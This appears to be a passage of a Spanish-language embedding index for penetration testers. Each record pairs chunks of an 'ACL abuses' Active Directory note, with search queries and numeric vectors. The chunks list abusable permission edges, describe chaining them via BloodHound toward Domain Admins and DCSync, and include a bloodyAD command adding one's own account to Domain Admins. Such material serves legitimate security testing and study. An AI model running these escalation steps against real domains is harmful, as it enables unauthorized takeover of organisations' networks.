0.02472, 0.01613, -0.02109, -0.04412]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# ACL abuses\n\n> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.", "indexar": "cual programa me ayuda a mapear los abusos de permisos mal configurados", "v": [0.26247, 0.12133, -0.03572, -0.16494, 0.03818, 0.0032, 0.01905, -0.03402, -0.22807, -0.06595, -0.0538, -0.02106, 0.01733, 0.00888, -0.05864, -0.11014, 0.1058, 0.06641, 0.09112, 0.03467, 0.06037, -0.0632, -0.03104, 0.03151, -0.16438, 0.00452, 0.07884, -0.14974, -0.12701, -0.16249, -0.03733, 0.03604, -0.04455, -0.08264, 0.00186, 0.01921, -0.01069, -0.06137, -0.05497, 0.05996, 0.05188, -0.13003, -0.07852, 0.01561, 0.0317, -0.06851, -0.03296, 0.04735, -0.06119, -0.00416, -0.01324, -0.07251, -0.09022, -0.09525, 0.05928, -0.03843, 0.11754, -0.15107, -0.0141, 0.03742, -0.07616, -0.09329, 0.06324, 0.03705, 0.07613, 0.0015, 0.14516, 0.00383, -0.05373, 0.08227, -0.04417, 0.11946, 0.10677, -0.02961, 0.01885, 0.00278, -0.07431, -0.10429, 0.04085, -0.02719, 0.03989, 0.07514, -0.0954, 0.00405, -0.08747, -0.01416, 0.04431, -0.00242, 0.03447, -0.09206, 0.01954, 0.03498, 0.02855, 0.00205, 0.04371, -0.08671, 0.02312, 0.1062, 0.02204, 0.04359, 0.04453, -0.02056, -0.06289, 0.08936, -0.00294, 0.07611, 0.06283, -0.06393, -0.08505, 0.04831, 0.04231, 0.0778, -0.00087, 0.02873, -0.00128, 0.02104, -0.00682, -0.03088, 0.01781, -0.15029, -0.01304, 0.03975, 0.00308, 0.11818, 0.07654, 0.07303, -0.00621, 0.08361, 0.05173, 0.06491, 0.06263, -0.03719, 0.02929, -0.0097, -0.08812, -0.04722, -0.03261, 0.01578, -0.09605, 0.01304, 0.04558, 0.10336, 0.07322, 0.04725, 0.02529, 0.06321, 0.00697, -0.01348, -0.0036, -0.03123, 0.03854, 0.04228, 0.04996, 0.06733, -0.04031, 0.02985, -0.05039, -0.07741, -0.08074, 0.05976, -0.04085, -0.03928, 0.00911, 0.02829, 0.10384, -0.00147, 0.02889, 0.04656, 0.04586, 0.04731, -0.06361, 0.03164, 0.07094, -0.02413, 0.00924, -0.06664, 0.00155, -0.02795, -0.02235, 0.02435, -0.10291, -0.00405, 0.05269, 0.00394, -0.07085, 0.01748, -0.06385, 0.02337, 0.01993, -0.00673, -0.00522, 0.10334, 0.03829, -0.06422, 0.00468, -0.03755, -0.02511, 0.02969, -0.01601, -0.04925, 0.01437, -0.02602, -0.01301, -0.06519, 0.01324, 0.05436, 0.03416, 0.00029, 0.02421, 0.05033, 0.02875, -0.02288, 0.02292, -0.01417, -0.08135, -0.00449, -0.01228, 0.0335, 0.02687, -0.04801, 0.00147, 0.02674, 0.0786, 0.03, 0.00746, -0.02533, 0.08668, 0.00243, 0.00497, 0.06519, 0.00898, -0.04191, -0.05141, -0.07389, -0.03696, -0.01856, 0.00688, -0.04829, 0.01719, -0.07251, 0.01536, 0.0587, 0.05335, -0.03969, -0.02633, -0.02671, -0.05308, -0.02032, -0.01565, 0.00329, 0.0242, 0.07839, 0.06826, -0.07966, 0.07353, -0.01959]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# ACL abuses\n\n> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.", "indexar": "con que puedo descubrir cΓ³mo se puede escalar un dominio desde la perspectiva de BloodHound", "v": [-0.02831, 0.05694, -0.16148, 0.02071, -0.0494, 0.02687, 0.01861, -0.04657, -0.03123, -0.09765, 0.06172, -0.09964, -0.05019, -0.02972, 0.03409, -0.02566, 0.06592, 0.04152, -0.03875, -0.04204, 0.00651, -0.10784, -0.06885, -0.02141, 0.1054, -0.12461, 0.00351, 0.08342, 0.01144, -0.02668, -0.01409, 0.01155, 0.00245, 0.02027, 0.02675, -0.07023, -0.0221, 0.07068, 0.09481, -0.03225, -0.08724, 0.02785, 0.01834, -0.12066, -0.04886, 0.01861, -0.12705, -0.00804, 0.00697, -0.07663, 0.02664, 0.03756, -0.10285, -0.14128, 0.02815, 0.03997, 0.13289, -0.02229, 0.09571, -0.11075, -0.0245, 0.01161, -0.01811, -0.02399, -0.07439, -0.14356, -0.05481, 0.05428, -0.09855, 0.08104, -0.06939, -0.01926, 0.02314, 0.01337, 0.05712, -0.06608, 0.11092, -0.04278, 0.17397, -0.04113, 0.05556, 0.03831, -0.06385, 0.04891, -0.08809, -0.09983, 0.03161, -0.09228, 0.10225, 0.05548, 0.06054, -0.05753, -0.0892, -0.05983, -0.08545, -0.05299, 0.08038, -0.06755, -0.03905, 0.02669, -0.02614, 0.05527, -0.15126, 0.14805, 0.11882, 0.06567, -0.00987, -0.08435, -0.07292, -0.03862, 0.02346, 0.01536, -0.10113, 0.01284, -0.16983, -0.06527, -0.0103, 0.02344, 0.00123, -0.08059, -0.06087, -0.06479, 0.03478, 0.00981, -0.021, -0.09075, -0.08099, 0.01796, -0.00288, -0.08144, -0.07547, 0.10792, 0.02758, -0.03842, 0.02249, 0.0988, -0.01274, 7e-05, 0.04566, -0.12005, 0.0276, 0.02373, 0.00405, -0.01442, -0.00169, -0.04098, -0.03397, -0.14919, -0.06798, -0.02156, -0.07446, 0.06658, 0.01118, 0.17705, 0.03185, -0.00829, 0.01675, -0.03287, -0.03103, 0.11235, -0.03593, -0.00279, -0.07983, 0.0039, 0.01591, 0.04804, -0.0475, -0.0162, -0.04038, -0.01178, -0.00025, 0.01067, -0.00189, 0.04872, 0.02743, -0.05463, -0.0356, -0.11339, 0.00996, 0.05829, -0.02988, -0.01716, -0.03086, 0.0087, -0.02827, -0.00559, 0.04937, -0.03012, -0.02612, 0.04981, 0.01985, 0.07559, 0.02063, -0.02153, -0.0157, -0.09495, 0.04201, -0.00483, -0.02818, -0.01193, -0.00618, -0.06083, -0.0253, -0.00832, 0.00872, -0.06667, -0.04684, 0.09728, -0.04626, 0.03799, 0.01208, -0.05073, 0.0689, -0.07341, -0.02753, -0.00524, -0.00964, -0.02225, -0.11373, -0.04841, -0.00541, 0.09595, 0.09431, -0.03646, -0.0005, 0.00667, -0.02767, 0.00452, 0.03207, 0.04424, -0.05494, 0.07191, -0.05962, 0.03432, 0.01135, 0.1029, 0.07302, 0.00233, -0.01528, -0.00541, 0.02106, 0.07688, 0.03721, -0.0231, -0.04896, -0.14184, -0.05265, 0.09704, 0.01533, -0.04577, -0.01753, 0.00176, 0.04398, 0.03823, 0.03437, -0.05249]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Las aristas peligrosas\n```\nGenericAll β†’ control total sobre el objeto\nWriteDACL β†’ te das a ti mismo cualquier permiso\nAddMember β†’ te metes en un grupo (ej. Domain Admins)\nForceChangePassword β†’ cambias la pass de otro usuario sin saber la actual\nGenericWrite β†’ modificar atributos (ej. aΓ±adir SPN β†’ Kerberoasting dirigido)\n```", "indexar": "que herramienta sirve para modificar los permisos DACL de un objeto en Windows?", "v": [0.00592, 0.06005, -0.11599, -0.20048, 0.01165, -0.13885, -0.10301, 0.01892, -0.02598, -0.13032, 0.0344, -0.09352, 0.05142, -0.1672, 0.02495, -0.00301, 0.09837, -0.16863, -0.07977, -0.02247, 0.0432, -0.05192, -0.09633, 0.00544, -0.16126, 0.00814, 0.04872, -0.10795, -0.22897, 0.03293, -0.02086, 0.04566, -0.00625, -0.04318, -0.00144, -0.02528, -0.10364, -0.01925, 0.0245, 0.06006, 0.05751, 0.08445, -0.07204, 0.13317, 0.00111, -0.01423, -0.00226, 0.08296, -0.04057, 0.03999, 0.00762, -0.0709, -0.13922, -0.08349, 0.06046, -0.0368, 0.22325, -0.11729, 0.01174, -0.08134, -0.10411, 0.00625, -0.12716, 0.01587, -0.00244, -0.01984, -0.018, 0.01499, -0.0162, 0.06467, -0.06544, 0.01176, 0.10947, -0.0203, 0.04918, -0.04399, -0.07042, -0.01726, 0.10617, -0.05304, 0.07412, 0.03258, -0.18154, -0.07784, -0.00102, -0.10003, 0.05664, -0.07993, 0.017, -0.07199, 0.07085, 0.10242, 0.00347, 0.01163, 0.06391, -0.03626, 0.00539, -0.00511, -0.01102, 0.09414, 0.14605, -0.06799, -0.07055, 0.08784, -0.06725, 0.10303, -0.00826, -0.07921, -0.06084, 0.00645, 0.01141, 0.06649, -0.02109, -0.01644, 0.04958, 0.04091, -0.02935, -0.09241, -0.02166, -0.00603, 0.02203, -0.02578, -0.05947, 0.01127, -0.04128, -0.01748, -0.06601, 0.15635, -0.04947, -0.01002, 0.0327, -0.0043, -0.01267, 0.08772, -0.09028, 0.00857, 0.03763, -0.10397, 0.02108, -0.0577, 0.09661, 0.07135, 0.04191, -0.0089, 0.02649, 0.00697, 0.04333, 0.02825, -0.03664, -0.05218, 0.0832, -0.05949, 0.00366, 0.06129, -0.05107, 0.05458, -0.04601, 0.04553, -0.02925, 0.08944, -0.03706, 0.01402, 0.01137, -0.02625, 0.02324, -0.06309, -0.00108, 0.01583, 0.09112, -0.00039, -0.04587, -0.00214, -0.00361, 0.01337, 0.03573, -0.01649, 0.01398, -0.01283, -0.03461, -0.05616, -0.07507, 0.01358, -0.042, -0.03541, 0.03419, -0.03914, -0.01002, 0.01116, -0.0523, 0.03458, -0.05834, 0.07, 0.0574, -0.10635, 0.01467, 0.00923, -0.03305, -0.02502, 0.07176, -0.01292, -0.03381, -0.03249, -0.03014, -0.06271, 0.07224, -0.00919, -0.02757, 0.00339, 0.02771, 0.00704, 0.00229, -0.0016, 0.03201, -0.03299, -0.02279, -0.01828, 0.02707, 0.01333, -0.01373, -0.0279, 0.09398, -0.01613, 0.08109, -0.02106, 0.00627, -0.00521, 0.0174, 0.01255, 0.04146, 0.02453, 0.03603, 0.01366, 0.00397, -0.0176, 0.05935, -0.01656, 0.03584, -0.03222, -0.02207, -0.00861, -0.04653, 0.04774, -0.01523, -0.05723, -0.04759, -0.05491, -0.00101, -0.00569, -0.02536, -0.08135, -0.00079, 0.01284, 0.08125, -0.03281, 0.00844, -0.02127]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Las aristas peligrosas\n```\nGenericAll β†’ control total sobre el objeto\nWriteDACL β†’ te das a ti mismo cualquier permiso\nAddMember β†’ te metes en un grupo (ej. Domain Admins)\nForceChangePassword β†’ cambias la pass de otro usuario sin saber la actual\nGenericWrite β†’ modificar atributos (ej. aΓ±adir SPN β†’ Kerberoasting dirigido)\n```", "indexar": "cual programa puedo usar para cambiar la contraseΓ±a de otro usuario sin saberla?", "v": [-0.08062, 0.08972, -0.16967, -0.17346, -0.0629, -0.10852, -0.07253, -0.14319, -0.13234, -0.10243, -0.05065, -0.10623, -0.03195, -0.07749, -0.09365, -0.0448, 0.13504, 0.03108, 0.10446, 0.00368, 0.05517, -0.03662, 0.00758, -0.08139, -0.09566, 0.03982, 0.04268, -0.0803, -0.03289, -0.07049, -0.00142, 0.00036, 0.13388, -0.0159, 0.00247, 0.15058, 0.08324, 0.01511, 0.13024, 0.13981, 0.10696, 0.08183, -0.05385, 0.16241, 0.01933, 0.08068, 0.02561, -0.00415, 0.02123, -0.00672, -0.02896, -0.05092, -0.08806, -0.11167, 0.07619, -0.13848, 0.17036, -0.10368, -0.04004, -0.01606, -0.05109, 0.01947, 0.04719, 0.0988, -0.06602, -0.10042, 0.03198, 0.0077, -0.1271, 0.10284, -0.00207, -0.00107, -0.051, -0.02907, 0.01913, 0.04383, 0.07386, -0.10676, 0.09668, 0.04602, -0.11114, 0.01225, 0.04371, 0.0108, -0.08524, -0.02155, 0.05899, -0.07235, 0.05806, -0.06373, 0.04085, 0.00949, 0.04513, 0.03714, 0.06394, -0.0617, 0.01407, 0.00455, -0.06642, -0.01072, 0.10067, -0.00369, -0.03416, 0.18397, -0.05664, -0.02311, 0.01901, -0.04227, -0.05125, -0.02155, 0.05636, 0.01413, -0.07189, -0.05902, -0.03677, 0.0379, -0.02688, -0.09185, 0.02183, -0.03346, -0.09106, -0.00671, -0.04352, -0.00617, 0.14778, 0.03028, 0.04884, 0.10338, -0.07432, 0.02553, -0.03366, -0.01259, 0.0081, -0.01222, -0.07974, -0.03359, -0.01484, -0.07127, -0.07273, 0.00537, 0.0045, 0.03917, -0.00286, 0.01185, 0.05592, -0.00174, 0.04123, -0.07412, -0.08727, 0.02984, 0.0205, -0.02823, 0.00545, 0.02832, -0.0353, -0.00302, 0.02852, -0.07891, -0.02354, 0.03378, -0.08149, -0.0337, 0.00768, -0.03308, -0.02297, -0.11318, 0.02474, 0.04302, 0.06256, 0.06182, 0.03445, 0.08407, 0.02634, -0.00043, 0.00965, -0.03426, -0.061, -0.04052, 0.00146, -0.06106, -0.00947, 0.0134, 0.02979, 0.00035, 0.00554, -0.0766, 0.02549, 0.03433, -0.06428, -0.00109, 0.02237, 0.02853, 0.02524, -0.00102, 0.02135, -0.02187, 0.02524, -0.04819, -0.0012, -0.10469, 0.00268, 0.016, -0.00599, -0.04597, 0.08157, 0.0165, -0.06211, -0.04128, 0.05056, 0.02496, 0.05379, -0.05651, 0.05347, 0.00135, -0.0503, -0.06605, -0.02739, 0.08181, 0.00929, 0.01129, 0.04082, 0.03926, 0.00996, 0.03886, -0.00239, -0.04382, -0.01386, -0.00146, -0.03444, 0.01065, -0.03352, 0.03496, -0.0116, -0.03287, 0.09442, -0.00663, -0.05514, -0.03082, -0.01488, -0.07884, -0.04503, 0.07899, 0.00693, -0.06898, -0.02679, 0.04926, -0.10914, 0.03508, -0.03839, 0.00031, -0.05717, 0.0131, 0.03095, -0.05756, 0.02162, 0.06213]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Las aristas peligrosas\n```\nGenericAll β†’ control total sobre el objeto\nWriteDACL β†’ te das a ti mismo cualquier permiso\nAddMember β†’ te metes en un grupo (ej. Domain Admins)\nForceChangePassword β†’ cambias la pass de otro usuario sin saber la actual\nGenericWrite β†’ modificar atributos (ej. aΓ±adir SPN β†’ Kerberoasting dirigido)\n```", "indexar": "con que puedo agregar a mi cuenta a grupos administrativos con permisos totales?", "v": [0.22895, 0.20529, -0.06567, -0.06153, 0.10782, 0.03605, 0.09869, -0.01891, -0.22859, -0.09797, -0.05927, 0.01789, 0.08362, 0.08058, 0.1674, -0.09318, 0.03877, -0.06033, 0.03876, 0.1219, 0.13158, -0.09248, 0.01936, 0.00019, -0.07982, -0.09002, 0.13894, -0.01826, -0.06534, -0.0331, 0.01254, 0.0395, 0.03024, -0.10958, 0.06899, -0.05013, -0.00467, 0.10173, -0.0546, -0.08386, -0.011, 0.08249, -0.17596, -0.01842, -0.03879, -0.05697, -0.07645, 0.09889, -0.07909, -0.07527, -0.05408, 0.03422, -0.12318, -0.0394, -0.11027, 0.05064, 0.08049, -0.06977, -0.01263, 0.07017, -0.06399, 0.0491, -0.01634, 0.08853, -0.00605, 0.08798, 0.1148, 0.02571, -0.04223, 0.10294, -0.08143, 0.01427, -0.05863, -0.01914, -0.03419, 0.04438, -0.07019, -0.00171, -0.01363, 0.02762, 0.02495, -0.01944, -0.05418, -0.03679, -0.01585, -0.11541, -0.07077, -0.05036, 0.03852, 0.01856, 0.06568, -0.06011, -0.00775, -0.00374, -0.01776, 0.01024, -0.01404, 0.0747, -0.08339, 0.08242, 0.01118, 0.03044, -0.06362, 0.12841, -0.04318, 0.11667, 0.00343, -0.06804, 0.04145, 0.03394, 0.03554, -0.02352, -0.04799, 0.00463, 0.08733, 0.05275, -0.0625, -0.0005, -0.02918, -0.03258, 0.02537, -0.01913, -0.03859, 0.04191, 0.01311, -0.09079, -0.00065, 0.07775, -0.00724, 0.04876, -0.01955, -0.00235, -0.00433, 0.01498, -0.03563, 0.02731, -0.10737, 0.01427, 0.01577, 0.01663, -0.04997, 0.06315, 0.06515, -0.09025, 0.04868, 0.02809, -0.06638, -0.03095, -0.02494, -0.0028, 0.03577, 0.0375, -0.05267, 0.11134, -0.07244, 0.01065, -0.00081, -0.06015, -0.02668, 0.03524, 0.0456, 0.05365, 0.00022, 0.00931, 0.0166, -0.0228, -0.09142, 0.00024, 0.01232, 0.01409, -0.03978, -0.05485, 0.05996, -0.06351, 0.08285, -0.04293, -0.0799, -0.06944, 0.02065, 0.03976, -0.07239, -0.01496, -0.06008, -0.02984, -0.01831, -0.06555, -0.04541, 0.02162, 0.05188, 0.05699, -0.04852, 0.07005, 0.02763, -0.0432, -0.0195, 0.01438, 0.03071, 0.00117, 0.00527, -0.07955, 0.04256, -0.01202, -0.01745, -0.05444, -0.00076, 0.0043, -0.02038, 0.10443, 0.06254, -0.02178, 0.02472, -0.055, 0.05015, -0.05049, -0.07288, -0.04053, 0.00452, -0.02126, 0.02192, 0.04675, 0.05434, 0.05397, 0.07532, -0.00337, 0.1141, -0.02829, 0.04876, -0.00274, 0.01561, 0.07114, -0.024, 0.01171, -0.01727, -0.04966, 0.07034, 0.00733, 0.01337, -0.03474, -0.05951, 0.0387, 0.02335, 0.04707, 0.02928, -0.0532, -0.05588, -0.04863, -0.04408, 0.03479, -0.07529, -0.10267, 0.01711, 0.08302, 0.02077, -0.03354, 0.07562, -0.03423]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AddMember a un grupo:\nbloodyAD -d corp.local -u yo -p pass --host DC add groupMember \"Domain Admins\" yo\n```", "indexar": "que herramienta sirve para aΓ±adir miembros a grupos de dominio?", "v": [-0.03963, 0.07267, -0.13167, -0.21057, -0.0291, -0.09697, -0.00236, -0.04611, -0.08683, -0.03758, 0.03481, -0.05451, 0.00514, -0.236, 0.09085, -0.0564, 0.15092, -0.08945, -0.04142, -0.0104, -0.01203, 0.00665, -0.01776, -0.03971, -0.07503, -0.09214, 0.0479, -0.08993, -0.04657, 0.22056, 0.07828, -0.05214, -0.09492, -0.06955, -0.05538, -0.18902, -0.00793, 0.02479, 0.01128, 0.11513, -0.06585, -0.01658, -0.1911, -0.01495, -0.08797, 0.08244, -0.0893, 0.04599, 0.0329, 0.05553, 0.02217, -0.04816, -0.09581, -0.02702, -0.07563, -0.12023, 0.12997, -0.21669, -0.01868, -0.07203, -0.14772, -0.00424, -0.06425, -0.02464, -0.06219, -0.03283, -0.04274, 0.00347, -0.01377, 0.07591, -0.0478, -0.07646, 0.04854, -0.03081, -0.03044, -0.02869, 0.10877, 0.01147, 0.0362, -0.04262, 0.15843, 0.00053, -0.06367, -0.04728, -0.10499, -0.10647, 0.01685, -0.04438, 0.06149, -0.03741, 0.09853, 0.09823, 0.01474, -0.06107, 0.05405, -0.01838, 0.05835, 0.00355, 0.03712, -0.01422, 0.21219, -0.00135, -0.08875, 0.11142, 0.08505, 0.1095, -0.05037, -0.0624, 0.00886, 0.03163, 0.03309, -0.00435, -0.00401, 0.00626, 0.04207, 0.08074, -0.03191, 0.03337, -0.00109, -0.04351, 0.01555, -0.00191, -0.05743, -0.00887, -0.00734, -0.01888, 0.00545, 0.04832, -0.02188, -0.12336, -0.02544, -0.03594, -0.03217, 0.04448, -0.06857, 0.00789, 0.00065, -0.03529, -0.01061, -0.05133, 0.0101, 0.03781, -0.08671, -0.13201, 0.01863, -0.02186, 0.03806, -0.03993, 0.0312, 0.04539, -0.03382, -0.00818, -0.06808, 0.06378, -0.03688, 0.01941, -0.08737, 0.05146, -0.06117, -0.02134, -0.03864, -0.02369, 0.04797, 0.00799, 0.00622, -0.03153, 0.00928, -0.00544, 0.02717, 0.08546, 0.0488, -0.02049, 0.11336, 0.01133, 0.01578, 0.01242, -0.04814, 0.0109, 0.03057, 0.01162, -0.00829, -0.04151, -0.01636, 0.01608, 0.01368, 0.02515, 0.03834, -0.01283, -0.00574, 0.0678, -0.05212, 0.04098, -0.02437, -0.02379, -0.01313, 0.00789, -0.0144, -0.07923, 0.05038, -0.06782, -0.00559, -0.04836, 0.00277, 0.01513, -0.0052, 0.02212, 0.0058, -0.03621, 0.07271, 0.01994, 0.01171, -0.0077, 0.0144, -0.01397, -0.01017, -0.02913, 0.00831, -0.00488, -0.04446, 0.02729, -0.04923, 0.04664, 0.04116, 0.00788, 0.05194, 0.0392, 0.00247, -0.0312, 0.0434, -0.01501, 0.00945, -0.0177, 0.02466, -0.02834, 0.0514, -0.0493, 0.05091, 0.01775, -0.04404, 0.03906, -0.04391, 0.00838, 0.02387, 0.00575, -0.04576, -0.07066, -0.01901, 0.02542, -0.02746, -0.0536, -0.02298, 0.00028, 0.02965, -0.0091, 0.0153, -0.0062]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AddMember a un grupo:\nbloodyAD -d corp.local -u yo -p pass --host DC add groupMember \"Domain Admins\" yo\n```", "indexar": "con que puedo agregar usuarios al grupo Domain Admins en Windows Server?", "v": [-0.01731, 0.09785, -0.00284, -0.24409, -0.06477, 0.00366, 0.02725, -0.12659, -0.06494, -0.00904, -0.01013, -0.15739, -0.07593, -0.16915, 0.00604, -0.08096, 0.14013, -0.03539, 0.02838, 0.04732, 0.0347, 0.02017, -0.02669, 0.02931, -0.02228, -0.05475, 0.04591, -0.0819, 0.01371, 0.07155, 0.05446, -0.10301, -0.04014, -0.04031, 0.03347, -0.09202, 0.00375, 0.16174, 0.12013, 0.07804, -0.01318, 0.08053, -0.19963, 0.01161, -0.02985, 0.062, -0.00938, -0.10732, 0.0802, -0.08593, -0.0666, -0.04604, -0.10452, -0.01925, -0.04314, -0.06057, 0.11754, -0.18093, 0.0263, 0.04043, -0.06438, 0.08105, -0.07608, 0.0639, -0.03654, 0.01772, 0.01043, 0.06181, -0.00368, 0.14011, -0.01658, 0.01132, 0.037, -0.04681, 0.05462, 0.03415, 0.06768, -0.04558, 0.04261, -0.02579, 0.09976, 0.07779, -0.00969, -0.06112, -0.07266, -0.17986, -0.08768, -0.09435, 0.04174, -0.08072, 0.21518, -0.03322, 0.00846, -0.00329, 0.0532, -0.0588, 0.10774, -0.08359, -0.02148, -0.05677, -0.00879, 0.08989, -0.01081, 0.15357, 0.05579, 0.07835, 0.01858, -0.1278, 0.03416, -0.03151, 0.09663, -0.03901, -0.08833, -0.0043, -0.02406, 0.03583, -0.00593, -0.04492, 0.02893, 0.06635, -0.08153, -0.07009, -0.02826, -0.00038, -0.00716, -0.03786, 0.0159, 0.08168, -0.0973, -0.0819, -0.01832, 0.01838, -0.01436, -0.0241, -0.13404, 0.10316, -0.01032, 0.01502, 0.04096, -0.03732, -0.0198, 0.09125, 0.00534, -0.03512, 0.06797, -0.00733, 0.04239, -0.00555, -0.00185, -0.01943, 0.01105, -0.01223, -0.07158, -0.01522, -0.068, 0.01536, -0.00719, 0.0284, -0.03796, -0.00906, 0.03074, 8e-05, 0.04536, -0.03021, -0.03381, 0.02169, -0.02134, 0.02059, 0.02644, -0.03429, -0.00459, -0.03086, -0.008, -0.04348, 0.06806, 0.02164, 0.01785, -0.00497, 0.02813, 0.04412, -0.04258, -0.04396, -0.00749, 0.01436, -0.08487, 0.02604, -0.04884, 0.08693, 0.01214, 0.0122, -0.11587, 0.03654, 5e-05, -0.05515, 0.01081, -0.03562, -0.00351, -0.05048, 0.00824, -0.0606, -0.00247, -0.0115, -0.00847, -0.02561, -0.00649, -0.0132, -0.00059, 0.04312, 0.10337, 0.00017, -0.02133, -0.00135, -0.009, -0.03769, -0.05106, -0.02257, 0.06379, -0.00649, -0.01515, 0.00228, -0.07995, 0.0682, 0.0576, -0.00216, 0.06788, 0.0008, -0.07973, -0.00507, 0.02405, 0.02966, -0.01545, 0.02153, -0.00657, -0.03609, 0.03953, -0.02256, 0.0251, -0.0338, -0.0259, 0.04665, -0.05546, 0.04529, 0.01594, -0.03077, -0.07039, -0.09316, -0.01839, 0.02295, -0.07784, -0.04319, 0.03971, -0.00714, -0.00655, -0.05136, -0.03393, 0.05796]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# AddMember a un grupo:\nbloodyAD -d corp.local -u yo -p pass --host DC add groupMember \"Domain Admins\" yo\n```", "indexar": "cual es un programa que me ayude a gestionar membresΓ­as en Active Directory?", "v": [-0.10288, 0.13104, -0.01686, -0.14099, 0.06895, -0.0022, -0.06306, -0.01346, -0.18884, 0.03127, 0.02202, -0.11319, -0.0826, -0.10954, -0.00117, -0.04802, 0.18208, -0.01894, -0.00604, 0.04541, 0.03489, 0.1268, -0.03433, 0.04543, -0.00444, 0.06424, 0.04911, -0.12634, 0.0615, -0.03127, 0.08284, -0.01388, 0.0131, -0.12945, 0.12333, -0.05265, -0.05944, 0.01867, 0.06051, 0.0882, -0.17372, -0.0609, -0.07665, -0.01713, 0.12774, 0.08534, 0.00791, -0.08699, 0.00512, 0.03857, -0.08358, -0.05834, -0.02929, -0.04009, 0.05444, -0.04868, 0.00725, -0.13653, -0.0918, -0.07769, -0.06433, -0.02098, -0.02473, -0.06404, -0.11965, -0.05486, 0.13693, -0.0826, -0.08227, 0.08765, 0.00488, 0.04742, 0.01399, 0.04896, -0.0256, 0.02322, 0.07404, -0.00087, -0.06216, -0.01811, 0.13695, -0.04455, 0.03408, 0.08786, -0.11169, -0.10444, 0.03401, -0.04523, -0.03171, -0.03165, 0.0659, -0.02404, -0.06159, 0.01918, 0.01795, 0.04477, 0.13762, 0.11632, 0.0953, 0.05065, 0.00062, -0.03529, -0.05606, 0.13769, -0.00079, 0.12451, -0.01365, 0.01649, -0.04501, 0.0703, -0.0131, -0.01147, 0.00866, -0.07366, 0.00061, 0.06136, -0.03828, -0.07366, 0.07591, -0.02728, -0.12454, 0.01147, 0.02024, 0.03985, 0.13874, 0.05547, -0.02366, 0.1069, -0.01274, 0.10278, -0.05484, 0.02238, 0.01376, -0.08888, -0.09109, -0.05408, -0.05463, 0.03984, 0.02474, -0.08707, -0.07709, 0.02184, 0.03744, -0.00173, 0.08547, -0.04024, 0.01877, -0.01098, 0.03918, 0.10587, 0.00324, 0.0451, 0.01994, 0.07104, -0.03717, 0.03776, -0.00164, -0.00026, -0.05627, 0.00663, -0.02292, 0.04082, -0.02758, -0.05789, -0.00188, -0.06723, -0.07399, 0.05402, 0.04182, 0.08724, -0.02438, 0.07951, 0.04751, -0.03402, 0.01205, -0.03879, 0.00667, -0.10659, 0.10303, 0.04215, -0.02334, 0.07445, 0.03409, 0.03282, -0.05436, 0.00016, -0.02492, 0.07103, -0.01022, 0.00674, 0.0289, 0.04893, -0.08296, -0.04179, -0.00872, -0.01963, -0.01766, -0.0067, 0.04428, -0.06416, 0.0092, -0.00863, 0.01192, -0.01359, 0.03605, 0.0497, -0.04153, 0.07714, 0.10396, 0.01641, 0.00465, -7e-05, 0.08167, 0.02559, -0.06026, -0.0322, 0.01161, 0.01752, 0.001, 0.02141, -0.03071, 0.01038, 0.08556, 0.04039, 0.02385, -0.0546, 0.041, 0.05824, 0.03005, 0.04555, -0.06409, -0.04346, 0.02021, -0.05106, 0.0229, 0.01965, 0.02989, -0.04904, -0.01336, -0.04045, 0.03976, 0.08405, 0.00713, -0.00957, -0.03244, 0.01013, -0.06306, 0.06765, -0.0338, 0.01364, 0.00249, -0.00594, 0.03102, -0.06834, 0.04213, -0.01007]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Encadenado\nUna arista lleva a otra β†’ BloodHound calcula el **camino** hasta Domain Admins β†’ puede acabar en DCSync.\n\nRelacionado: BloodHound Β· LAPS Β· OSCP MOC", "indexar": "ΒΏcon quΓ© programa puedo calcular la ruta hacia los administradores de dominio?", "v": [0.06393, 0.03434, -0.06131, -0.06296, 0.03197, -0.03339, 0.19854, -0.0694, -0.25315, -0.01939, -0.03253, -0.13406, 0.08545, -0.12553, 0.07592, -0.00375, 0.13511, 0.00992, 0.01612, -0.04636, 0.06224, -0.14878, 0.08367, 0.04475, -0.09484, -0.03338, 0.096, -0.04666, 0.06115, 0.04615, 0.05829, 0.01353, 0.06989, -0.08722, 0.01817, 0.04426, 0.01939, 0.07675, 0.07028, 0.06182, -0.04144, -0.00151, -0.09403, -0.05985, 0.00409, -0.01153, -0.03353, -0.11436, 0.01143, -0.18767, -0.02707, -0.0767, -0.04533, -0.02051, 0.10449, -0.05477, 0.03162, -0.05434, 0.04281, -0.02045, 0.06102, 0.02093, -0.01544, 0.05317, -0.01428, -0.08256, 0.07486, -0.09057, -0.07099, 0.00842, -0.04425, 0.03218, -0.03718, 0.05379, 0.05493, 0.01963, 0.07747, 0.04773, 0.12753, -0.10124, -0.00276, 0.03136, -0.09064, -0.03336, 